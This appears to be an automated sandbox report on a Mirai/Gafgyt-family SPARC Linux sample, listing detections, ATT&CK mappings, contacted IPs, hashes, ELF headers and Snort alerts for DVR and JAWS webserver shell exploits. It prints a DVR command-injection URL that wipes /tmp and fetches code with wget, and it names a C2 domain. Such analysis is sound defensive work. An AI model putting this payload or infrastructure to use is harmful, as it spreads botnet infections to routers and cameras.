              Source: unknownNetwork traffic detected: HTTP traffic on port 56952 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54612 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48078 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53148 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49608 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54612 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37352 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38108 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54612 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56258 -> 37215
              Source: /tmp/if33NMq1O2.elf (PID: 6209)Queries kernel information via 'uname': Jump to behavior
              Source: if33NMq1O2.elf, 6209.1.0000560966119000.000056096619e000.rw-.sdmp, if33NMq1O2.elf, 6213.1.0000560966119000.000056096619e000.rw-.sdmp, if33NMq1O2.elf, 6258.1.0000560966119000.000056096619e000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
              Source: if33NMq1O2.elf, 6209.1.0000560966119000.000056096619e000.rw-.sdmp, if33NMq1O2.elf, 6213.1.0000560966119000.000056096619e000.rw-.sdmp, if33NMq1O2.elf, 6258.1.0000560966119000.000056096619e000.rw-.sdmpBinary or memory string: fV!/etc/qemu-binfmt/sparc
              Source: if33NMq1O2.elf, 6209.1.00007ffdd5534000.00007ffdd5555000.rw-.sdmp, if33NMq1O2.elf, 6213.1.00007ffdd5534000.00007ffdd5555000.rw-.sdmp, if33NMq1O2.elf, 6258.1.00007ffdd5534000.00007ffdd5555000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sparc/tmp/if33NMq1O2.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/if33NMq1O2.elf
              Source: if33NMq1O2.elf, 6209.1.00007ffdd5534000.00007ffdd5555000.rw-.sdmp, if33NMq1O2.elf, 6213.1.00007ffdd5534000.00007ffdd5555000.rw-.sdmp, if33NMq1O2.elf, 6258.1.00007ffdd5534000.00007ffdd5555000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: if33NMq1O2.elf, type: SAMPLE
              Source: Yara matchFile source: 6213.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6209.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6258.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: if33NMq1O2.elf, type: SAMPLE
              Source: Yara matchFile source: 6213.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6209.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6258.1.00007fd3b0011000.00007fd3b0023000.r-x.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
              Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
              OS Credential Dumping
              11
              Security Software Discovery
              Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
              Service Stop
              Acquire InfrastructureGather Victim Identity Information
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
              Non-Standard Port
              SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
              Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
              Non-Application Layer Protocol
              Data Encrypted for ImpactDNS ServerEmail Addresses
              Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication5
              Application Layer Protocol
              Data DestructionVirtual Private ServerEmployee Names
              Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeyloggingScheduled Transfer3
              Ingress Tool Transfer
              Data Encrypted for ImpactServerGather Victim Network Information
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1368672 Sample: if33NMq1O2.elf Startdate: 02/01/2024 Architecture: LINUX Score: 100 30 197.190.238.241 zain-asGH Ghana 2->30 32 156.158.248.170 airtel-tz-asTZ Tanzania United Republic of 2->32 34 99 other IPs or domains 2->34 36 Snort IDS alert for network traffic 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 42 3 other signatures 2->42 9 if33NMq1O2.elf 2->9         started        11 xfce4-panel wrapper-2.0 2->11         started        13 xfce4-panel wrapper-2.0 2->13         started        15 4 other processes 2->15 signatures3 process4 process5 17 if33NMq1O2.elf 9->17         started        process6 19 if33NMq1O2.elf 17->19         started        22 if33NMq1O2.elf 17->22         started        24 if33NMq1O2.elf 17->24         started        26 2 other processes 17->26 signatures7 44 Sample tries to kill multiple processes (SIGKILL) 19->44 28 if33NMq1O2.elf 22->28         started        process8

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              if33NMq1O2.elf69%ReversingLabsLinux.Trojan.Mirai
              if33NMq1O2.elf66%VirustotalBrowse
              if33NMq1O2.elf100%AviraEXP/ELF.Gafgyt.Gen.T
              No Antivirus matches
              SourceDetectionScannerLabelLink
              ezleaks.com8%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+0%Avira URL Cloudsafe
              http://</b> 212.102.41.2 <br>4000%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              ezleaks.com
              93.123.85.91
              truefalseunknown
              NameMaliciousAntivirus DetectionReputation
              http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+true
              • Avira URL Cloud: safe
              unknown
              http://</b> 212.102.41.2 <br>400false
              • Avira URL Cloud: safe
              low
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/soap/encoding/if33NMq1O2.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/if33NMq1O2.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  201.135.70.9
                  unknownMexico
                  8151UninetSAdeCVMXfalse
                  51.155.103.231
                  unknownUnited Kingdom
                  13037ZEN-ASZenInternet-UKGBfalse
                  39.44.18.181
                  unknownPakistan
                  45595PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKfalse
                  147.105.8.216
                  unknownUnited States
                  22522ULALAUNCHUSfalse
                  211.251.55.71
                  unknownKorea Republic of
                  38692JBES-AS-KRJeonlabukdoEducationResearchInformationInstitfalse
                  197.167.208.200
                  unknownEgypt
                  24863LINKdotNET-ASEGfalse
                  41.59.97.16
                  unknownTanzania United Republic of
                  33765TTCLDATATZfalse
                  85.173.246.127
                  unknownRussian Federation
                  42362ALANIA-ASBranchformerSevosetinelectrosvyazRUfalse
                  197.219.238.81
                  unknownMozambique
                  37342MOVITELMZfalse
                  156.124.100.133
                  unknownUnited States
                  393504XNSTGCAfalse
                  176.79.226.98
                  unknownPortugal
                  3243MEO-RESIDENCIALPTfalse
                  135.222.165.169
                  unknownUnited States
                  10455LUCENT-CIOUSfalse
                  156.67.35.98
                  unknownUnited Kingdom
                  48101CALLFLOW-ASCallFlowSolutionsLtdGBfalse
                  172.88.10.135
                  unknownUnited States
                  20001TWC-20001-PACWESTUSfalse
                  204.104.178.243
                  unknownUnited States
                  1239SPRINTLINKUSfalse
                  145.23.245.103
                  unknownNetherlands
                  1103SURFNET-NLSURFnetTheNetherlandsNLfalse
                  190.140.199.195
                  unknownPanama
                  18809CableOndaPAfalse
                  156.125.137.18
                  unknownUnited States
                  393504XNSTGCAfalse
                  36.127.240.179
                  unknownChina
                  4847CNIX-APChinaNetworksInter-ExchangeCNfalse
                  179.137.232.95
                  unknownBrazil
                  26599TELEFONICABRASILSABRfalse
                  57.67.217.112
                  unknownBelgium
                  51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRfalse
                  14.22.222.69
                  unknownChina
                  58466CT-GUANGZHOU-IDCCHINANETGuangdongprovincenetworkCNfalse
                  41.115.200.87
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  156.188.207.15
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  123.199.26.148
                  unknownKorea Republic of
                  10066GAYANET-AS-KRLGHelloVisionCorpKRfalse
                  197.4.200.36
                  unknownTunisia
                  5438ATI-TNfalse
                  23.7.233.55
                  unknownUnited States
                  16625AKAMAI-ASUSfalse
                  132.211.184.57
                  unknownCanada
                  376RISQ-ASCAfalse
                  124.248.204.162
                  unknownHong Kong
                  45267LIGHTWIRE-AS-APLightwireLTDNZfalse
                  204.73.141.59
                  unknownUnited States
                  5006VOYANTUSfalse
                  135.176.208.108
                  unknownUnited States
                  14962NCR-252USfalse
                  69.49.70.34
                  unknownUnited States
                  33734MPW-MACHLINK-NETUSfalse
                  156.235.189.161
                  unknownSeychelles
                  134548DXTL-HKDXTLTseungKwanOServiceHKfalse
                  14.52.140.82
                  unknownKorea Republic of
                  9638NH-ASNationalAgriculturalCooperativefederationKRfalse
                  13.193.38.66
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  164.213.14.110
                  unknownUnited States
                  3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
                  197.152.130.201
                  unknownTanzania United Republic of
                  37133airtel-tz-asTZfalse
                  197.89.147.97
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  140.67.5.38
                  unknownUnited States
                  23700FASTNET-AS-IDLinknet-FastnetASNIDfalse
                  156.235.45.156
                  unknownSeychelles
                  134705ITACE-AS-APItaceInternationalLimitedHKfalse
                  197.0.175.90
                  unknownTunisia
                  37705TOPNETTNfalse
                  142.48.96.110
                  unknownCanada
                  3633PROVINCE-OF-BRITISH-COLUMBIACAfalse
                  210.212.47.145
                  unknownIndia
                  9829BSNL-NIBNationalInternetBackboneINfalse
                  41.97.63.138
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  88.53.116.84
                  unknownItaly
                  3269ASN-IBSNAZITfalse
                  103.17.21.240
                  unknownPhilippines
                  132615PBATC-AS-APPipolBroadbandandTelecommunicationsCorporatifalse
                  156.144.112.193
                  unknownUnited States
                  3743ARCEL-2USfalse
                  80.250.220.70
                  unknownRussian Federation
                  21367ZVEZDATEL-ASRUfalse
                  41.245.154.183
                  unknownNigeria
                  328050Intercellular-Nigeria-ASNGfalse
                  111.116.210.186
                  unknownChina
                  4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                  156.50.27.186
                  unknownAustralia
                  29975VODACOM-ZAfalse
                  67.157.136.16
                  unknownUnited States
                  1226CTA-42-AS1226USfalse
                  148.168.175.229
                  unknownUnited States
                  11971PFIZERNET-GROTONUSfalse
                  164.132.129.138
                  unknownFrance
                  16276OVHFRfalse
                  195.136.103.182
                  unknownPoland
                  200539INTELLYSPJ-ASINTELLYPLfalse
                  72.188.187.181
                  unknownUnited States
                  33363BHN-33363USfalse
                  164.38.65.146
                  unknownUnited Kingdom
                  29355KCELL-ASKZfalse
                  93.229.27.84
                  unknownGermany
                  3320DTAGInternetserviceprovideroperationsDEfalse
                  94.222.50.156
                  unknownGermany
                  3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                  73.231.154.177
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  41.40.226.119
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  137.164.36.209
                  unknownUnited States
                  2152CSUNET-NWUSfalse
                  193.42.153.66
                  unknownPoland
                  48021ALSTOR-ASPLfalse
                  69.87.249.114
                  unknownUnited States
                  21898PTN-AS1USfalse
                  197.27.144.115
                  unknownTunisia
                  37492ORANGE-TNfalse
                  133.17.34.96
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  132.164.250.229
                  unknownReserved
                  6360UNIVHAWAIIUSfalse
                  163.184.90.122
                  unknownUnited States
                  72SCHLUMBERGER-ASUSfalse
                  188.204.222.28
                  unknownNetherlands
                  1136KPNKPNNationalEUfalse
                  197.235.33.87
                  unknownMozambique
                  37223VODACOM-MZfalse
                  175.12.211.14
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  197.129.211.17
                  unknownMorocco
                  6713IAM-ASMAfalse
                  197.190.238.241
                  unknownGhana
                  37140zain-asGHfalse
                  156.158.248.170
                  unknownTanzania United Republic of
                  37133airtel-tz-asTZfalse
                  126.9.249.70
                  unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                  197.139.229.108
                  unknownKenya
                  36914KENET-ASKEfalse
                  150.72.126.255
                  unknownJapan6400CompaniaDominicanadeTelefonosSADOfalse
                  161.219.118.45
                  unknownUnited States
                  36522BELLMOBILITY-1CAfalse
                  132.11.223.143
                  unknownUnited States
                  367DNIC-ASBLK-00306-00371USfalse
                  117.34.75.45
                  unknownChina
                  4835CHINANET-IDC-SNChinaTelecomGroupCNfalse
                  171.168.198.129
                  unknownUnited States
                  9874STARHUB-MOBILEStarHubLtdSGfalse
                  46.102.232.129
                  unknownRomania
                  39758SIMPLIQ-ASROfalse
                  103.162.242.155
                  unknownunknown
                  7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                  156.182.145.46
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  156.61.32.151
                  unknownUnited Kingdom
                  39400LBH-ASCountyCouncilGBfalse
                  59.254.238.194
                  unknownChina
                  37937CNNIC-EGOVNET-APChinaeGovNetInformationCenterCNfalse
                  156.191.172.21
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  62.242.237.99
                  unknownDenmark
                  3292TDCTDCASDKfalse
                  147.168.203.83
                  unknownUnited States
                  12087SALSGIVERUSfalse
                  95.44.121.76
                  unknownIreland
                  5466EIRCOMInternetHouseIEfalse
                  134.183.83.186
                  unknownUnited Kingdom
                  4704SANNETRakutenMobileIncJPfalse
                  156.79.242.145
                  unknownUnited States
                  11363FUJITSU-USAUSfalse
                  41.167.147.142
                  unknownSouth Africa
                  36937Neotel-ASZAfalse
                  96.9.165.170
                  unknownSingapore
                  134809VIEWQWEST-AS-APViewQwestSdnBhdMYfalse
                  25.179.250.215
                  unknownUnited Kingdom
                  7922COMCAST-7922USfalse
                  186.250.196.230
                  unknownBrazil
                  28162IBLTelecomunicacoesLtdaBRfalse
                  68.196.234.250
                  unknownUnited States
                  6128CABLE-NET-1USfalse
                  84.199.146.217
                  unknownBelgium
                  6848TELENET-ASBEfalse
                  8.102.218.75
                  unknownUnited States
                  3356LEVEL3USfalse
                  99.224.248.151
                  unknownCanada
                  812ROGERS-COMMUNICATIONSCAfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  41.59.97.16sora.arm.elfGet hashmaliciousMiraiBrowse
                    BSi1j39YE3.elfGet hashmaliciousMirai, MoobotBrowse
                      bk.x86-20221002-1437.elfGet hashmaliciousMiraiBrowse
                        bk.mips-20221002-0650.elfGet hashmaliciousMiraiBrowse
                          notabotnet.x86_64.elfGet hashmaliciousMiraiBrowse
                            201.135.70.9NIGmpsl.elfGet hashmaliciousUnknownBrowse
                              85.173.246.127bsBroI2hBPGet hashmaliciousMiraiBrowse
                                197.219.238.81x86-20230509-0207.elfGet hashmaliciousMirai, MoobotBrowse
                                  DI3zQL0c27.elfGet hashmaliciousMirai, MoobotBrowse
                                    XZm7Ogz35KGet hashmaliciousMiraiBrowse
                                      tjNQ8Zdo5vGet hashmaliciousMiraiBrowse
                                        Rubify.x86Get hashmaliciousMiraiBrowse
                                          39.44.18.181f8hilTNGRMGet hashmaliciousMiraiBrowse
                                            156.124.100.133bok.mips-20230311-0506.elfGet hashmaliciousMiraiBrowse
                                              068iG6omAZGet hashmaliciousMiraiBrowse
                                                176.79.226.98x86_64Get hashmaliciousMiraiBrowse
                                                  135.222.165.169sMuKf3HLPGGet hashmaliciousUnknownBrowse
                                                    x86Get hashmaliciousMiraiBrowse
                                                      197.167.208.20015PRjvBuol.elfGet hashmaliciousMirai, MoobotBrowse
                                                        AOtiJ2KF7GGet hashmaliciousMiraiBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          ezleaks.comh0r0zx00x.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 93.123.85.91
                                                          J0eiWEw7mS.elfGet hashmaliciousMiraiBrowse
                                                          • 93.123.85.91
                                                          CiUCHCrTLs.elfGet hashmaliciousMiraiBrowse
                                                          • 93.123.85.91
                                                          HGd8FQaNOK.elfGet hashmaliciousMiraiBrowse
                                                          • 93.123.85.91
                                                          bot.x86_64.elfGet hashmaliciousMiraiBrowse
                                                          • 91.92.249.96
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          UninetSAdeCVMXfile.exeGet hashmaliciousPhorpiexBrowse
                                                          • 189.237.13.221
                                                          file.exeGet hashmaliciousPhorpiexBrowse
                                                          • 189.142.134.149
                                                          skyljne.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 189.174.189.79
                                                          skyljne.x86_64.elfGet hashmaliciousMiraiBrowse
                                                          • 189.250.109.237
                                                          x86-20240101-1250.elfGet hashmaliciousMiraiBrowse
                                                          • 201.144.123.185
                                                          arm-20240101-1250.elfGet hashmaliciousMiraiBrowse
                                                          • 200.23.38.227
                                                          lariauts.exeGet hashmaliciousAmadeyBrowse
                                                          • 189.232.29.90
                                                          hfJupY4dpE.elfGet hashmaliciousMiraiBrowse
                                                          • 189.239.147.146
                                                          OIpWHA8mdz.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                                          • 187.156.96.226
                                                          zY72q7d3Da.elfGet hashmaliciousMiraiBrowse
                                                          • 189.141.254.174
                                                          UhpB22Atau.elfGet hashmaliciousMiraiBrowse
                                                          • 187.227.9.204
                                                          s8M01kYpwz.elfGet hashmaliciousMiraiBrowse
                                                          • 200.23.38.223
                                                          arm7.elfGet hashmaliciousMiraiBrowse
                                                          • 201.155.218.203
                                                          x86.elfGet hashmaliciousMiraiBrowse
                                                          • 201.145.48.176
                                                          hoho.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 201.127.239.102
                                                          EdRzQIfoXb.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                          • 187.134.52.10
                                                          PqNwF6rNqr.elfGet hashmaliciousMiraiBrowse
                                                          • 187.140.74.72
                                                          rDQnhb6OBJ.elfGet hashmaliciousMiraiBrowse
                                                          • 148.219.63.160
                                                          a3SIMycc8C.elfGet hashmaliciousMiraiBrowse
                                                          • 189.225.200.47
                                                          jMDesRW1NQ.elfGet hashmaliciousMiraiBrowse
                                                          • 201.144.22.158
                                                          ZEN-ASZenInternet-UKGBB843BuO7i3.exeGet hashmaliciousGlupteba, RedLine, SmokeLoaderBrowse
                                                          • 88.97.50.121
                                                          arm-20231204-0650.elfGet hashmaliciousMiraiBrowse
                                                          • 88.97.71.58
                                                          wMFVAaZ5ki.elfGet hashmaliciousMiraiBrowse
                                                          • 188.122.52.207
                                                          L8PCdNq0xs.elfGet hashmaliciousMiraiBrowse
                                                          • 88.98.151.173
                                                          6qoPxRL15H.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 82.68.116.91
                                                          oBtxppgLWB.elfGet hashmaliciousMiraiBrowse
                                                          • 51.148.150.246
                                                          FVShYxZJpc.elfGet hashmaliciousMiraiBrowse
                                                          • 88.98.151.181
                                                          h7TOIMgvTM.elfGet hashmaliciousMiraiBrowse
                                                          • 88.97.95.35
                                                          bHFZDHNHZw.elfGet hashmaliciousMiraiBrowse
                                                          • 82.71.79.4
                                                          rvOM61u4nZ.elfGet hashmaliciousMiraiBrowse
                                                          • 82.70.221.167
                                                          UQE31l3N6I.elfGet hashmaliciousMiraiBrowse
                                                          • 88.96.134.56
                                                          https://www.google.com/search?q=cv-2960+nusil++%22dielectric%22+constant&sca_esv=574510585&rlz=1C1GCEU_enUS895US895&biw=2560&bih=1323&ei=jk4wZfuPOZ--0PEPua-56Aw&ved=0ahUKEwj7jtLVxYCCAxUfHzQIHblXDs0Q4dUDCBA&uact=5&oq=cv-2960+nusil++%22dielectric%22+constant&gs_lp=Egxnd3Mtd2l6LXNlcnAiJGN2LTI5NjAgbnVzaWwgICJkaWVsZWN0cmljIiBjb25zdGFudDIIECEYoAEYwwRI1xVQkQlYlRRwAXgAkAEAmAFaoAGoBKoBATe4AQPIAQD4AQHCAggQABiiBBiwA8ICCxAAGIkFGKIEGLADwgIFEAAYogTCAggQABiJBRiiBOIDBBgBIEGIBgGQBgQ&sclient=gws-wiz-serp#ip=1Get hashmaliciousUnknownBrowse
                                                          • 62.3.66.85
                                                          GRQbCYMQri.elfGet hashmaliciousMiraiBrowse
                                                          • 212.22.96.28
                                                          Saikin.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 88.96.134.34
                                                          q1dVMUWAya.elfGet hashmaliciousMiraiBrowse
                                                          • 82.70.92.18
                                                          A9q7CUU6By.elfGet hashmaliciousMiraiBrowse
                                                          • 82.70.221.180
                                                          xd.x86.elfGet hashmaliciousMiraiBrowse
                                                          • 217.155.41.128
                                                          yourbiggestnightmare.arm7.elfGet hashmaliciousMiraiBrowse
                                                          • 88.98.151.189
                                                          mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 51.150.230.255
                                                          rwZFZF8WCp.elfGet hashmaliciousMiraiBrowse
                                                          • 212.22.96.51
                                                          PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKx86-20240101-1250.elfGet hashmaliciousMiraiBrowse
                                                          • 39.43.110.248
                                                          UhpB22Atau.elfGet hashmaliciousMiraiBrowse
                                                          • 182.184.180.237
                                                          HzVSmFnQIA.elfGet hashmaliciousMiraiBrowse
                                                          • 39.44.147.117
                                                          arm7.elfGet hashmaliciousMiraiBrowse
                                                          • 39.37.234.214
                                                          arm4-20231216-1200.elfGet hashmaliciousMiraiBrowse
                                                          • 182.191.230.220
                                                          mpsl-20231212-1319.elfGet hashmaliciousMiraiBrowse
                                                          • 39.49.232.148
                                                          Yzkk3B5jl4.elfGet hashmaliciousMiraiBrowse
                                                          • 39.60.158.209
                                                          h7m0G9L0ut.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          • 39.39.132.213
                                                          Ry3wzzBEE0.elfGet hashmaliciousMiraiBrowse
                                                          • 182.187.67.107
                                                          GvJmL3JXiO.elfGet hashmaliciousMiraiBrowse
                                                          • 182.177.155.177
                                                          2NM1gcGSOl.elfGet hashmaliciousMiraiBrowse
                                                          • 39.32.237.211
                                                          nabx86.elfGet hashmaliciousUnknownBrowse
                                                          • 182.179.228.90
                                                          nabarm7.elfGet hashmaliciousMiraiBrowse
                                                          • 119.152.9.203
                                                          mJHY33okRC.elfGet hashmaliciousMiraiBrowse
                                                          • 182.188.100.133
                                                          tHRIRkYRbE.elfGet hashmaliciousMiraiBrowse
                                                          • 182.182.141.11
                                                          LxeFp9UNtA.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 182.190.1.18
                                                          disprovable.dllGet hashmaliciousCryptOne, QbotBrowse
                                                          • 39.44.5.104
                                                          skid.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 116.71.15.217
                                                          cool.x86.elfGet hashmaliciousUnknownBrowse
                                                          • 39.50.110.76
                                                          gvUvZ3t4MP.elfGet hashmaliciousMiraiBrowse
                                                          • 182.181.8.79
                                                          No context
                                                          No context
                                                          No created / dropped files found
                                                          File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
                                                          Entropy (8bit):6.141823242823824
                                                          TrID:
                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                          File name:if33NMq1O2.elf
                                                          File size:74'760 bytes
                                                          MD5:164d5388d64b5e1427f2df0375e51352
                                                          SHA1:fb0d8c86b6909f1137dfb77a40c716fdd453ac13
                                                          SHA256:1f21e09f4da090783aa816fdb36fd530da92aea0fe7967f3ae8def43b2f27de7
                                                          SHA512:d145a896e32ad92b3554064b6f059fc139757bd7d6a95e210c88a0c514d9a71c5c1c2d74f8aecfbbd83f527d998f9cecbdca2efc6b42f9638076e69b7687b0a6
                                                          SSDEEP:1536:M68wmSYWGZf51tVHtEZ9i5wJ/NSIId8aWJy:t30Txnc/0dJ
                                                          TLSH:47735A25B87A2E23C0E8B47A52B78361B2E6234E34B4C61D7D720F8DFF146A06567177
                                                          File Content Preview:.ELF...........................4.."x.....4. ...(.......................................... ... ... ....8............dt.Q................................@..(....@.A.................#.....b8..`.....!..... ...@.....".........`......$ ... ...@...........`....

                                                          ELF header

                                                          Class:ELF32
                                                          Data:2's complement, big endian
                                                          Version:1 (current)
                                                          Machine:Sparc
                                                          Version Number:0x1
                                                          Type:EXEC (Executable file)
                                                          OS/ABI:UNIX - System V
                                                          ABI Version:0
                                                          Entry Point Address:0x101a4
                                                          Flags:0x0
                                                          ELF Header Size:52
                                                          Program Header Offset:52
                                                          Program Header Size:32
                                                          Number of Program Headers:3
                                                          Section Header Offset:74360
                                                          Section Header Size:40
                                                          Number of Section Headers:10
                                                          Header String Table Index:9
                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                          NULL0x00x00x00x00x0000
                                                          .initPROGBITS0x100940x940x1c0x00x6AX004
                                                          .textPROGBITS0x100b00xb00x108140x00x6AX004
                                                          .finiPROGBITS0x208c40x108c40x140x00x6AX004
                                                          .rodataPROGBITS0x208d80x108d80x15f00x00x2A008
                                                          .ctorsPROGBITS0x320000x120000x80x00x3WA004
                                                          .dtorsPROGBITS0x320080x120080x80x00x3WA004
                                                          .dataPROGBITS0x320180x120180x2200x00x3WA008
                                                          .bssNOBITS0x322380x122380x4700x00x3WA008
                                                          .shstrtabSTRTAB0x00x122380x3e0x00x0001
                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                          LOAD0x00x100000x100000x11ec80x11ec86.17900x5R E0x10000.init .text .fini .rodata
                                                          LOAD0x120000x320000x320000x2380x6a82.90690x6RW 0x10000.ctors .dtors .data .bss
                                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          192.168.2.2352.51.210.25354244802025883 01/02/24-06:25:26.161554TCP2025883ET EXPLOIT MVPower DVR Shell UCE5424480192.168.2.2352.51.210.253
                                                          192.168.2.2345.148.36.4256504802025883 01/02/24-06:24:01.272066TCP2025883ET EXPLOIT MVPower DVR Shell UCE5650480192.168.2.2345.148.36.42
                                                          192.168.2.2391.200.67.11059548802030092 01/02/24-06:24:19.258178TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5954880192.168.2.2391.200.67.110
                                                          192.168.2.2323.208.169.837612802025883 01/02/24-06:24:14.264263TCP2025883ET EXPLOIT MVPower DVR Shell UCE3761280192.168.2.2323.208.169.8
                                                          192.168.2.23162.159.129.10357618802025883 01/02/24-06:24:03.166357TCP2025883ET EXPLOIT MVPower DVR Shell UCE5761880192.168.2.23162.159.129.103
                                                          192.168.2.23104.230.152.22550120802030092 01/02/24-06:24:30.618084TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5012080192.168.2.23104.230.152.225
                                                          192.168.2.23188.128.206.16847120802025883 01/02/24-06:24:13.779989TCP2025883ET EXPLOIT MVPower DVR Shell UCE4712080192.168.2.23188.128.206.168
                                                          192.168.2.2323.33.51.1137284802025883 01/02/24-06:25:10.230054TCP2025883ET EXPLOIT MVPower DVR Shell UCE3728480192.168.2.2323.33.51.11
                                                          192.168.2.2343.192.122.6537836802025883 01/02/24-06:25:44.376815TCP2025883ET EXPLOIT MVPower DVR Shell UCE3783680192.168.2.2343.192.122.65
                                                          192.168.2.2358.152.149.559232802025883 01/02/24-06:24:41.116385TCP2025883ET EXPLOIT MVPower DVR Shell UCE5923280192.168.2.2358.152.149.5
                                                          192.168.2.2363.195.193.24042464802025883 01/02/24-06:23:51.372398TCP2025883ET EXPLOIT MVPower DVR Shell UCE4246480192.168.2.2363.195.193.240
